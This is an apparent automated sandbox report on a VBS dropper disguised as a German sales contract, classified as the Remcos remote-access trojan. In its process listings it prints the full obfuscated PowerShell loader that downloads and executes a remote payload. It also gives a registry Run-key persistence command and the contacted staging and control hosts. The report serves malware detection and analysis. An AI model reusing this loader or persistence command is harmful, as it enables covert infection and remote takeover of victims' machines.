Malware Analysis Report

2025-08-06 01:46

Sample ID 241031-dd3b1swqhs
Target 31102024_0254_Kaufvertrag-Markus-Daten.vbs
SHA256 7e6c9757b46fc71815670a8056b6db913409bb571775642ef865ea633fe41cc9
Tags
execution remcos telou62tos discovery persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7e6c9757b46fc71815670a8056b6db913409bb571775642ef865ea633fe41cc9

Threat Level: Known bad

The file 31102024_0254_Kaufvertrag-Markus-Daten.vbs was found to be: Known bad.

Malicious Activity Summary

execution remcos telou62tos discovery persistence rat

Remcos

Remcos family

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Command and Scripting Interpreter: PowerShell

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry key

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-31 02:54

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-31 02:54

Reported

2024-10-31 02:59

Platform

win7-20240903-en

Max time kernel

300s

Max time network

121s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31102024_0254_Kaufvertrag-Markus-Daten.vbs"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31102024_0254_Kaufvertrag-Markus-Daten.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Mastigophobia pigritia Untractarian Rightists Excerpist Damasceres Campaspe #>;$Rhizophoraceae26='Patriarkaternes';<#Precorruptness Regeringsoverhoveder Polianthes Badelagenerne #>; function Mikki($Fremlysningerne174){If ($host.DebuggerEnabled) {$Hugorme++;}$Grafikrutines=$Theomania+$Fremlysningerne174.'Length'-$Hugorme; for ( $Rasterets240=2;$Rasterets240 -lt $Grafikrutines;$Rasterets240+=3){$Dissour=$Rasterets240;$Monistiskes+=$Fremlysningerne174[$Rasterets240];$Jentjenerne='Kontrakternes';}$Monistiskes;}function Forureningsforebyg($Cuddlier){ & ($Matematikemne) ($Cuddlier);}$Vrinsker=Mikki ' uM no Cz Mi elPelF aTi/ a ';$Vaskemaskinens=Mikki ' AT lEpsSc1 2 i ';$Systemkartoteker='Sc[ InKneArt E.Nes .eCurinvBuiBuCCye pPN.oovIFanEpt mStAE nInA CgSkeKaRFo]e : ,:PhsPaemiC ,UU.RT,iBotSuYlip RrL o jtFao RC Mo el S=,e$SiV aa eSvakSles.MEmA,isPakAriMaN Be SN.psN ';$Vrinsker+=Mikki 'Fr5 T.Af0 c Si(NuWAsi .nFid CoRiwInsD. AnN UTDi Mi1B 0 J. ,0ba; a UbWApiTrnSu6 D4 L;pe SyxEm6In4Me; m Clr v M:Ka1I.3,u1 o. C0 F)K. GrG neopc ekCooU /I.2 T0Wi1No0Su0 A1Em0 .1De FiFS,iRermueExf Bo Cxbo/ e1Ud3 H1Pr.P,0 a ';$Europaudvalg=Mikki 'V u as eRyrSm- BAAtG UEOvnShTSp ';$Medsster=Mikki 'Ruh .tSttSip ds .: N/P / wL wK wR..A,sAfe LvHaet,n utkookao lA.sCu.TrdFjeja/TiwSvp .-AiaAmdSkmn iCunEl/SwuAfsB.e ar n/WacZyeN,rSluFosS e.o.And Sw Pp u ';$Satieno=Mikki 'Sc>,o ';$Matematikemne=Mikki 'FlI BE sXNo ';$Downstrokes='Islamite212';$Radioavisers148='\Udskriftssiders.boe';Forureningsforebyg (Mikki 'Ad$GyG rLOvONob.aAC.lKo: HFoAF,mS pSiEunGT,AChr hNReeThRBoNTrEP s K=Gu$Hpe CNC,VVe:Ura nPK.p edBeA lT aa ,+,e$crrSaa DTri BOS.aEevInIDoSRoe,nRT S .1S,4B 8Be ');Forureningsforebyg (Mikki 'Du$ GC lS ORebFoaMol C:MiF uoDiR Dk aIArNE.Geu2Fr3Kl3,i= S$ErmVoeBadWrSDeS St ee nR S.,rS GpR,LSkiGat T(Ov$ AsMua.oT ,ILieDynAfOep)B ');Forureningsforebyg (Mikki $Systemkartoteker);$Medsster=$Forking233[0];$Antibiotikaer=(Mikki '.r$PrGGaLbaoC.B A KLRe:Tsi.qn.uDE iBav iAnDM.u.eaEkl.niDeS STGiS a=E,N eEKoWBr-Dyo kBOvJ oe.ac MtSe Rs AYP sT tEfe Amar.Z,n eShT,n.HowT,e AbFiC,elVri.le,eNM.tVe ');Forureningsforebyg ($Antibiotikaer);Forureningsforebyg (Mikki 'In$MuI .nNadmai ovDeiSpdTruGraBilBei HsS tTasF,.,eHs,eShaSid e trPrs o[Ur$ iE,ouUnrCooMipsuaOpuHod v PaBelHyg o]So= r$ IVCor ai Mn HsExk einr r ');$Unbloodiness=Mikki ' Y$ RI .n bdBeiObv riNodMuuGua l iD s Ft PsEu.AdDPeo cw,snArlDroS a dK.FGoi SlAneDe(D.$alMNieSkdFlsSis atS,eParDi, P$ cYPodIneNor iSignoeSksS )Ko ';$Yderiges=$Hampegarnernes;Forureningsforebyg (Mikki ' A$ iG elSeoT B iA AL U:BrKQua,oGLiSHytMirVeyPrg,anTaiOvnAmGKi=Ud(FiT NEFeSFiTB.- PGra UtClHso D$AbYPadWie RRoIOrg eKlsSt)An ');while (!$Kagstrygning) {Forureningsforebyg (Mikki 'Wh$U gUdl oo lbStaSalG.:CiPB h aCosGem SaAftBlr noA,pDaeRe=Un$WrtS r SuPre t ') ;Forureningsforebyg $Unbloodiness;Forureningsforebyg (Mikki 'MuSS.tUnAFlRFotEp-HeSK.lB,e teB,Pam Si4ov ');Forureningsforebyg (Mikki 'In$DaG eLOro FbSta ILR :StKFaaApghos,at FrSayMaG hn Di,rnSogIn= .( nt PE SSraTAn- ,PT AunTb hRe Fd$L.y dC.eKerA IOrgInEAts l) t ') ;Forureningsforebyg (Mikki 'Co$G,G Sl eoPaBBiaAkLR.: HhClo lReD ,EwapPilThaUddMoS uEKorT = $InGPolErOBabw aBeLMi:A,PEarErO vAfIStaT.NDotUne.inFiS U+My+ A%Fa$H F KOInrSok iI oN Gh.2Un3Em3Wo. .C aoSnUTwNSmTPa ') ;$Medsster=$Forking233[$Holdepladser];}$Lepidodendrids=339347;$merchandise=28186;Forureningsforebyg (Mikki 'Ra$MaG SLTrOGaBBaA LW,:SaSTroO g nO,eDivB eKrj gSPu D =No DegF.eUntBl-roC SoHyn,iT ReMin AtBe .n$Mny,rDFoE.prFlI RGS EUnsL ');Forureningsforebyg (Mikki 'Dd$Pug.ilHvo eb ra l.a:S S HePrrP vC i Cc Se SyUbdnoe ,lt.sMae erPe Sk=,m Sk[DeSMoyPasKot,ae imM .YeC ooPonPtv yeKirNetf.] A: r:KoFMorRuoCam DBj a asC.eRi6Si4.vS.ft,orali MnskgPu(Co$ .SM oOpgH nUde.evFieRajUdsT.)Cl ');Forureningsforebyg (Mikki 'Ov$ G El FoE,bPaa aLha: nu tNB PCyR moT pEmAFlg,laNeN ,D yiFiS uTPeIO,cF. El=Se Sk[ SsDoy,iSH T PE AM F.ret PEDyXSeTla.ApePonOnC oRaDHyIRuNS gIm]Un:Is:KvA ,SSlcE,IM IMe..hgHyeReT sHaT ,rYaIOpN ng V(Ox$,hS ,eS R BVBrIe CUrE AyR dVueA LRgS EUrRSa)H, ');Forureningsforebyg (Mikki 'In$F gS.lH,OOpBEkAUll,n:UnO .POmLA.SExE mlKaI VGDdh SEErDScE PnvoS.d=Ed$A usjnFlP FrUdOAvpA AKogSeAAfn OdUdi VsAntHeiV cSt.MaSS UobBHest t URStIN NR.gCh(B,$ lAeE RpSuIDiDAno PDKoEhaNG DTiRReISpd EsCe,Fy$BamSkED.r,oc H.ea.hNAcd NISiSSqe.n) n ');Forureningsforebyg $Oplselighedens;"

Network

N/A

Files

memory/2988-4-0x000007FEF532E000-0x000007FEF532F000-memory.dmp

memory/2988-5-0x000000001B650000-0x000000001B932000-memory.dmp

memory/2988-6-0x00000000022D0000-0x00000000022D8000-memory.dmp

memory/2988-7-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-8-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-10-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-9-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-11-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-12-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-13-0x000007FEF532E000-0x000007FEF532F000-memory.dmp

memory/2988-14-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-15-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-16-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-17-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-31 02:54

Reported

2024-10-31 02:59

Platform

win10v2004-20241007-en

Max time kernel

299s

Max time network

299s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31102024_0254_Kaufvertrag-Markus-Daten.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ineffableness = "%Disfoliage% -windowstyle 1 $Varetagelsen=(gp -Path 'HKCU:\\Software\\Aetheogamic\\').Lerholdighedens;%Disfoliage% ($Varetagelsen)" C:\Windows\SysWOW64\reg.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31102024_0254_Kaufvertrag-Markus-Daten.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Mastigophobia pigritia Untractarian Rightists Excerpist Damasceres Campaspe #>;$Rhizophoraceae26='Patriarkaternes';<#Precorruptness Regeringsoverhoveder Polianthes Badelagenerne #>; function Mikki($Fremlysningerne174){If ($host.DebuggerEnabled) {$Hugorme++;}$Grafikrutines=$Theomania+$Fremlysningerne174.'Length'-$Hugorme; for ( $Rasterets240=2;$Rasterets240 -lt $Grafikrutines;$Rasterets240+=3){$Dissour=$Rasterets240;$Monistiskes+=$Fremlysningerne174[$Rasterets240];$Jentjenerne='Kontrakternes';}$Monistiskes;}function Forureningsforebyg($Cuddlier){ & ($Matematikemne) ($Cuddlier);}$Vrinsker=Mikki ' uM no Cz Mi elPelF aTi/ a ';$Vaskemaskinens=Mikki ' AT lEpsSc1 2 i ';$Systemkartoteker='Sc[ InKneArt E.Nes .eCurinvBuiBuCCye pPN.oovIFanEpt mStAE nInA CgSkeKaRFo]e : ,:PhsPaemiC ,UU.RT,iBotSuYlip RrL o jtFao RC Mo el S=,e$SiV aa eSvakSles.MEmA,isPakAriMaN Be SN.psN ';$Vrinsker+=Mikki 'Fr5 T.Af0 c Si(NuWAsi .nFid CoRiwInsD. AnN UTDi Mi1B 0 J. ,0ba; a UbWApiTrnSu6 D4 L;pe SyxEm6In4Me; m Clr v M:Ka1I.3,u1 o. C0 F)K. GrG neopc ekCooU /I.2 T0Wi1No0Su0 A1Em0 .1De FiFS,iRermueExf Bo Cxbo/ e1Ud3 H1Pr.P,0 a ';$Europaudvalg=Mikki 'V u as eRyrSm- BAAtG UEOvnShTSp ';$Medsster=Mikki 'Ruh .tSttSip ds .: N/P / wL wK wR..A,sAfe LvHaet,n utkookao lA.sCu.TrdFjeja/TiwSvp .-AiaAmdSkmn iCunEl/SwuAfsB.e ar n/WacZyeN,rSluFosS e.o.And Sw Pp u ';$Satieno=Mikki 'Sc>,o ';$Matematikemne=Mikki 'FlI BE sXNo ';$Downstrokes='Islamite212';$Radioavisers148='\Udskriftssiders.boe';Forureningsforebyg (Mikki 'Ad$GyG rLOvONob.aAC.lKo: HFoAF,mS pSiEunGT,AChr hNReeThRBoNTrEP s K=Gu$Hpe CNC,VVe:Ura nPK.p edBeA lT aa ,+,e$crrSaa DTri BOS.aEevInIDoSRoe,nRT S .1S,4B 8Be ');Forureningsforebyg (Mikki 'Du$ GC lS ORebFoaMol C:MiF uoDiR Dk aIArNE.Geu2Fr3Kl3,i= S$ErmVoeBadWrSDeS St ee nR S.,rS GpR,LSkiGat T(Ov$ AsMua.oT ,ILieDynAfOep)B ');Forureningsforebyg (Mikki $Systemkartoteker);$Medsster=$Forking233[0];$Antibiotikaer=(Mikki '.r$PrGGaLbaoC.B A KLRe:Tsi.qn.uDE iBav iAnDM.u.eaEkl.niDeS STGiS a=E,N eEKoWBr-Dyo kBOvJ oe.ac MtSe Rs AYP sT tEfe Amar.Z,n eShT,n.HowT,e AbFiC,elVri.le,eNM.tVe ');Forureningsforebyg ($Antibiotikaer);Forureningsforebyg (Mikki 'In$MuI .nNadmai ovDeiSpdTruGraBilBei HsS tTasF,.,eHs,eShaSid e trPrs o[Ur$ iE,ouUnrCooMipsuaOpuHod v PaBelHyg o]So= r$ IVCor ai Mn HsExk einr r ');$Unbloodiness=Mikki ' Y$ RI .n bdBeiObv riNodMuuGua l iD s Ft PsEu.AdDPeo cw,snArlDroS a dK.FGoi SlAneDe(D.$alMNieSkdFlsSis atS,eParDi, P$ cYPodIneNor iSignoeSksS )Ko ';$Yderiges=$Hampegarnernes;Forureningsforebyg (Mikki ' A$ iG elSeoT B iA AL U:BrKQua,oGLiSHytMirVeyPrg,anTaiOvnAmGKi=Ud(FiT NEFeSFiTB.- PGra UtClHso D$AbYPadWie RRoIOrg eKlsSt)An ');while (!$Kagstrygning) {Forureningsforebyg (Mikki 'Wh$U gUdl oo lbStaSalG.:CiPB h aCosGem SaAftBlr noA,pDaeRe=Un$WrtS r SuPre t ') ;Forureningsforebyg $Unbloodiness;Forureningsforebyg (Mikki 'MuSS.tUnAFlRFotEp-HeSK.lB,e teB,Pam Si4ov ');Forureningsforebyg (Mikki 'In$DaG eLOro FbSta ILR :StKFaaApghos,at FrSayMaG hn Di,rnSogIn= .( nt PE SSraTAn- ,PT AunTb hRe Fd$L.y dC.eKerA IOrgInEAts l) t ') ;Forureningsforebyg (Mikki 'Co$G,G Sl eoPaBBiaAkLR.: HhClo lReD ,EwapPilThaUddMoS uEKorT = $InGPolErOBabw aBeLMi:A,PEarErO vAfIStaT.NDotUne.inFiS U+My+ A%Fa$H F KOInrSok iI oN Gh.2Un3Em3Wo. .C aoSnUTwNSmTPa ') ;$Medsster=$Forking233[$Holdepladser];}$Lepidodendrids=339347;$merchandise=28186;Forureningsforebyg (Mikki 'Ra$MaG SLTrOGaBBaA LW,:SaSTroO g nO,eDivB eKrj gSPu D =No DegF.eUntBl-roC SoHyn,iT ReMin AtBe .n$Mny,rDFoE.prFlI RGS EUnsL ');Forureningsforebyg (Mikki 'Dd$Pug.ilHvo eb ra l.a:S S HePrrP vC i Cc Se SyUbdnoe ,lt.sMae erPe Sk=,m Sk[DeSMoyPasKot,ae imM .YeC ooPonPtv yeKirNetf.] A: r:KoFMorRuoCam DBj a asC.eRi6Si4.vS.ft,orali MnskgPu(Co$ .SM oOpgH nUde.evFieRajUdsT.)Cl ');Forureningsforebyg (Mikki 'Ov$ G El FoE,bPaa aLha: nu tNB PCyR moT pEmAFlg,laNeN ,D yiFiS uTPeIO,cF. El=Se Sk[ SsDoy,iSH T PE AM F.ret PEDyXSeTla.ApePonOnC oRaDHyIRuNS gIm]Un:Is:KvA ,SSlcE,IM IMe..hgHyeReT sHaT ,rYaIOpN ng V(Ox$,hS ,eS R BVBrIe CUrE AyR dVueA LRgS EUrRSa)H, ');Forureningsforebyg (Mikki 'In$F gS.lH,OOpBEkAUll,n:UnO .POmLA.SExE mlKaI VGDdh SEErDScE PnvoS.d=Ed$A usjnFlP FrUdOAvpA AKogSeAAfn OdUdi VsAntHeiV cSt.MaSS UobBHest t URStIN NR.gCh(B,$ lAeE RpSuIDiDAno PDKoEhaNG DTiRReISpd EsCe,Fy$BamSkED.r,oc H.ea.hNAcd NISiSSqe.n) n ');Forureningsforebyg $Oplselighedens;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Mastigophobia pigritia Untractarian Rightists Excerpist Damasceres Campaspe #>;$Rhizophoraceae26='Patriarkaternes';<#Precorruptness Regeringsoverhoveder Polianthes Badelagenerne #>; function Mikki($Fremlysningerne174){If ($host.DebuggerEnabled) {$Hugorme++;}$Grafikrutines=$Theomania+$Fremlysningerne174.'Length'-$Hugorme; for ( $Rasterets240=2;$Rasterets240 -lt $Grafikrutines;$Rasterets240+=3){$Dissour=$Rasterets240;$Monistiskes+=$Fremlysningerne174[$Rasterets240];$Jentjenerne='Kontrakternes';}$Monistiskes;}function Forureningsforebyg($Cuddlier){ & ($Matematikemne) ($Cuddlier);}$Vrinsker=Mikki ' uM no Cz Mi elPelF aTi/ a ';$Vaskemaskinens=Mikki ' AT lEpsSc1 2 i ';$Systemkartoteker='Sc[ InKneArt E.Nes .eCurinvBuiBuCCye pPN.oovIFanEpt mStAE nInA CgSkeKaRFo]e : ,:PhsPaemiC ,UU.RT,iBotSuYlip RrL o jtFao RC Mo el S=,e$SiV aa eSvakSles.MEmA,isPakAriMaN Be SN.psN ';$Vrinsker+=Mikki 'Fr5 T.Af0 c Si(NuWAsi .nFid CoRiwInsD. AnN UTDi Mi1B 0 J. ,0ba; a UbWApiTrnSu6 D4 L;pe SyxEm6In4Me; m Clr v M:Ka1I.3,u1 o. C0 F)K. GrG neopc ekCooU /I.2 T0Wi1No0Su0 A1Em0 .1De FiFS,iRermueExf Bo Cxbo/ e1Ud3 H1Pr.P,0 a ';$Europaudvalg=Mikki 'V u as eRyrSm- BAAtG UEOvnShTSp ';$Medsster=Mikki 'Ruh .tSttSip ds .: N/P / wL wK wR..A,sAfe LvHaet,n utkookao lA.sCu.TrdFjeja/TiwSvp .-AiaAmdSkmn iCunEl/SwuAfsB.e ar n/WacZyeN,rSluFosS e.o.And Sw Pp u ';$Satieno=Mikki 'Sc>,o ';$Matematikemne=Mikki 'FlI BE sXNo ';$Downstrokes='Islamite212';$Radioavisers148='\Udskriftssiders.boe';Forureningsforebyg (Mikki 'Ad$GyG rLOvONob.aAC.lKo: HFoAF,mS pSiEunGT,AChr hNReeThRBoNTrEP s K=Gu$Hpe CNC,VVe:Ura nPK.p edBeA lT aa ,+,e$crrSaa DTri BOS.aEevInIDoSRoe,nRT S .1S,4B 8Be ');Forureningsforebyg (Mikki 'Du$ GC lS ORebFoaMol C:MiF uoDiR Dk aIArNE.Geu2Fr3Kl3,i= S$ErmVoeBadWrSDeS St ee nR S.,rS GpR,LSkiGat T(Ov$ AsMua.oT ,ILieDynAfOep)B ');Forureningsforebyg (Mikki $Systemkartoteker);$Medsster=$Forking233[0];$Antibiotikaer=(Mikki '.r$PrGGaLbaoC.B A KLRe:Tsi.qn.uDE iBav iAnDM.u.eaEkl.niDeS STGiS a=E,N eEKoWBr-Dyo kBOvJ oe.ac MtSe Rs AYP sT tEfe Amar.Z,n eShT,n.HowT,e AbFiC,elVri.le,eNM.tVe ');Forureningsforebyg ($Antibiotikaer);Forureningsforebyg (Mikki 'In$MuI .nNadmai ovDeiSpdTruGraBilBei HsS tTasF,.,eHs,eShaSid e trPrs o[Ur$ iE,ouUnrCooMipsuaOpuHod v PaBelHyg o]So= r$ IVCor ai Mn HsExk einr r ');$Unbloodiness=Mikki ' Y$ RI .n bdBeiObv riNodMuuGua l iD s Ft PsEu.AdDPeo cw,snArlDroS a dK.FGoi SlAneDe(D.$alMNieSkdFlsSis atS,eParDi, P$ cYPodIneNor iSignoeSksS )Ko ';$Yderiges=$Hampegarnernes;Forureningsforebyg (Mikki ' A$ iG elSeoT B iA AL U:BrKQua,oGLiSHytMirVeyPrg,anTaiOvnAmGKi=Ud(FiT NEFeSFiTB.- PGra UtClHso D$AbYPadWie RRoIOrg eKlsSt)An ');while (!$Kagstrygning) {Forureningsforebyg (Mikki 'Wh$U gUdl oo lbStaSalG.:CiPB h aCosGem SaAftBlr noA,pDaeRe=Un$WrtS r SuPre t ') ;Forureningsforebyg $Unbloodiness;Forureningsforebyg (Mikki 'MuSS.tUnAFlRFotEp-HeSK.lB,e teB,Pam Si4ov ');Forureningsforebyg (Mikki 'In$DaG eLOro FbSta ILR :StKFaaApghos,at FrSayMaG hn Di,rnSogIn= .( nt PE SSraTAn- ,PT AunTb hRe Fd$L.y dC.eKerA IOrgInEAts l) t ') ;Forureningsforebyg (Mikki 'Co$G,G Sl eoPaBBiaAkLR.: HhClo lReD ,EwapPilThaUddMoS uEKorT = $InGPolErOBabw aBeLMi:A,PEarErO vAfIStaT.NDotUne.inFiS U+My+ A%Fa$H F KOInrSok iI oN Gh.2Un3Em3Wo. .C aoSnUTwNSmTPa ') ;$Medsster=$Forking233[$Holdepladser];}$Lepidodendrids=339347;$merchandise=28186;Forureningsforebyg (Mikki 'Ra$MaG SLTrOGaBBaA LW,:SaSTroO g nO,eDivB eKrj gSPu D =No DegF.eUntBl-roC SoHyn,iT ReMin AtBe .n$Mny,rDFoE.prFlI RGS EUnsL ');Forureningsforebyg (Mikki 'Dd$Pug.ilHvo eb ra l.a:S S HePrrP vC i Cc Se SyUbdnoe ,lt.sMae erPe Sk=,m Sk[DeSMoyPasKot,ae imM .YeC ooPonPtv yeKirNetf.] A: r:KoFMorRuoCam DBj a asC.eRi6Si4.vS.ft,orali MnskgPu(Co$ .SM oOpgH nUde.evFieRajUdsT.)Cl ');Forureningsforebyg (Mikki 'Ov$ G El FoE,bPaa aLha: nu tNB PCyR moT pEmAFlg,laNeN ,D yiFiS uTPeIO,cF. El=Se Sk[ SsDoy,iSH T PE AM F.ret PEDyXSeTla.ApePonOnC oRaDHyIRuNS gIm]Un:Is:KvA ,SSlcE,IM IMe..hgHyeReT sHaT ,rYaIOpN ng V(Ox$,hS ,eS R BVBrIe CUrE AyR dVueA LRgS EUrRSa)H, ');Forureningsforebyg (Mikki 'In$F gS.lH,OOpBEkAUll,n:UnO .POmLA.SExE mlKaI VGDdh SEErDScE PnvoS.d=Ed$A usjnFlP FrUdOAvpA AKogSeAAfn OdUdi VsAntHeiV cSt.MaSS UobBHest t URStIN NR.gCh(B,$ lAeE RpSuIDiDAno PDKoEhaNG DTiRReISpd EsCe,Fy$BamSkED.r,oc H.ea.hNAcd NISiSSqe.n) n ');Forureningsforebyg $Oplselighedens;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "ineffableness" /t REG_EXPAND_SZ /d "%Disfoliage% -windowstyle 1 $Varetagelsen=(gp -Path 'HKCU:\Software\Aetheogamic\').Lerholdighedens;%Disfoliage% ($Varetagelsen)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "ineffableness" /t REG_EXPAND_SZ /d "%Disfoliage% -windowstyle 1 $Varetagelsen=(gp -Path 'HKCU:\Software\Aetheogamic\').Lerholdighedens;%Disfoliage% ($Varetagelsen)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.seventools.de udp
DE 217.160.0.59:443 www.seventools.de tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 59.0.160.217.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 www.campingplatz-goldbergersee.de udp
FR 92.205.55.123:443 www.campingplatz-goldbergersee.de tcp
US 8.8.8.8:53 ocsp.starfieldtech.com udp
US 192.124.249.36:80 ocsp.starfieldtech.com tcp
US 8.8.8.8:53 123.55.205.92.in-addr.arpa udp
US 8.8.8.8:53 36.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 www.pkwankauf.nrw udp
DE 217.160.0.183:443 www.pkwankauf.nrw tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 183.0.160.217.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 www.tla-autos.com udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
BG 45.88.88.33:9945 www.tla-autos.com tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 33.88.88.45.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 102.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 95.16.208.104.in-addr.arpa udp

Files

memory/2804-0-0x00007FFA367A3000-0x00007FFA367A5000-memory.dmp

memory/2804-1-0x0000017BA0010000-0x0000017BA0032000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ai1g2wb3.vbn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2804-11-0x00007FFA367A0000-0x00007FFA37261000-memory.dmp

memory/2804-12-0x00007FFA367A0000-0x00007FFA37261000-memory.dmp

memory/2804-15-0x00007FFA367A0000-0x00007FFA37261000-memory.dmp

memory/2804-18-0x00007FFA367A0000-0x00007FFA37261000-memory.dmp

memory/3540-19-0x0000000002600000-0x0000000002636000-memory.dmp

memory/3540-20-0x00000000050E0000-0x0000000005708000-memory.dmp

memory/3540-21-0x0000000004FE0000-0x0000000005002000-memory.dmp

memory/3540-23-0x0000000005930000-0x0000000005996000-memory.dmp

memory/3540-22-0x00000000058C0000-0x0000000005926000-memory.dmp

memory/3540-33-0x0000000005B80000-0x0000000005ED4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d336b18e0e02e045650ac4f24c7ecaa7
SHA1 87ce962bb3aa89fc06d5eb54f1a225ae76225b1c
